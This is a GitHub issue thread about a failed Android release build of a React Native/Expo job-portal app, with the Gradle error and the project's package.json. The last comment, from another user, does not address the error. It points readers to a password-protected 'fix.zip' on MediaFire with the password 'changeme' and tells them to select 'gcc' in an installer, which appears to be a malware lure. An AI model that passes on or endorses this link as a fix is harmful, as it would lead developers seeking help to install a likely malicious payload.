### ISSUE TITLE
Dependencies version error when building app

### ISSUE THREAD

**Issue by TranDangMyTien** [TranDangMyTien/ReactNative_JobPortalApp#1]
FAILURE: Build failed with an exception.
* What went wrong:
Execution failed for task ':react-native-gesture-handler:compileReleaseKotlin'.
> A failure occurred while executing org.jetbrains.kotlin.compilerRunner.GradleCompilerRunnerWithWorkers$GradleKotlinCompilerWorkAction
   > Compilation error. See log for more details
* Try:
> Run with --stacktrace option to get the stack trace.
> Run with --info or --debug option to get more log output.
> Run with --scan to get full insights.
> Get more help at https://help.gradle.org.
BUILD FAILED in 4m 14s
Deprecated Gradle features were used in this build, making it incompatible with Gradle 9.0.
You can use '--warning-mode all' to show the individual deprecation warnings and determine if they come from your own scripts or plugins.
For more on this, please refer to https://docs.gradle.org/8.8/userguide/command_line_interface.html#sec:command_line_warnings in the Gradle documentation.
494 actionable tasks: 494 executed
Error: Gradle build failed with unknown error. See logs for the "Run gradlew" phase for more information.

**Comment by TranDangMyTien** [comment]
{
  "name": "jobportalapp",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "start": "expo start --dev-client",
    "android": "npx expo run:android",
    "ios": "npx expo run:ios",
    "web": "expo start --web",
    "buildAAB": "eas build -p android --profile production",
    "buildAPK": "eas build -p android --profile preview"
  },
  "dependencies": {
    "@expo/vector-icons": "^14.0.2",
    "@react-native-async-storage/async-storage": "^1.23.1",
    "@react-native-community/datetimepicker": "^8.0.1",
    "@react-native-community/masked-view": "^0.1.11",
    "@react-native-firebase/app": "^20.4.0",
    "@react-native-firebase/auth": "^20.4.0",
    "@react-native-google-signin/google-signin": "^12.2.1",
    "@react-native-picker/picker": "^2.7.5",
    "@react-native/assets": "^1.0.0",
    "@react-navigation/bottom-tabs": "^6.5.20",
    "@react-navigation/drawer": "^6.7.0",
    "@react-navigation/native": "^6.1.17",
    "@react-navigation/stack": "^6.3.29",
    "axios": "^1.7.2",
    "electron": "^32.0.1",
    "env-cli": "^1.0.5",
    "expo": "^51.0.31",
    "expo-constants": "~16.0.1",
    "expo-dev-client": "~4.0.25",
    "expo-dev-launcher": "^4.0.27",
    "expo-font": "^12.0.9",
    "expo-image-picker": "^15.0.7",
    "expo-linear-gradient": "^13.0.2",
    "expo-linking": "~6.3.1",
    "expo-modules-autolinking": "^1.11.2",
    "expo-modules-core": "^1.12.23",
    "expo-router": "^3.5.23",
    "expo-splash-screen": "^0.27.5",
    "expo-status-bar": "~1.12.1",
    "expo-updates": "^0.25.24",
    "iconsax-react-native": "^0.0.8",
    "ip": "^2.0.1",
    "lottie-react-native": "^6.7.0",
    "metro-config": "^0.80.10",
    "metro-react-native-babel-preset": "^0.77.0",
    "moment": "^2.30.1",
    "node": "^22.5.0",
    "react": "^18.2.0",
    "react-native": "^0.74.5",
    "react-native-asset": "^2.1.1",
    "react-native-config": "^1.5.1",
    "react-native-eject": "^0.2.0",
    "react-native-elements": "^3.4.3",
    "react-native-fs": "^2.20.0",
    "react-native-gesture-handler": "^2.16.1",
    "react-native-image-picker": "^7.1.2",
    "react-native-image-zoom-viewer": "^3.0.1",
    "react-native-loading-spinner-overlay": "^3.0.1",
    "react-native-modal": "^13.0.1",
    "react-native-paper": "^5.12.3",
    "react-native-reanimated": "^3.10.1",
    "react-native-render-html": "^6.3.4",
    "react-native-safe-area-context": "^4.10.5",
    "react-native-safe-area-view": "^1.1.1",
    "react-native-screens": "^3.20.0",
    "react-native-svg": "^15.2.0",
    "react-native-swiper": "^1.6.0",
    "react-native-vector-icons": "^10.1.0",
    "react-navigation": "^5.0.0",
    "rn-nodeify": "^10.3.0",
    "watchman": "^1.0.0"
  },
  "devDependencies": {
    "@babel/core": "^7.24.7",
    "@expo/ngrok": "^4.1.3",
    "@types/react-native-vector-icons": "^6.4.18",
    "react-devtools": "^4.27.2",
    "react-native-dotenv": "^3.4.11"
  },
  "private": true
}

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
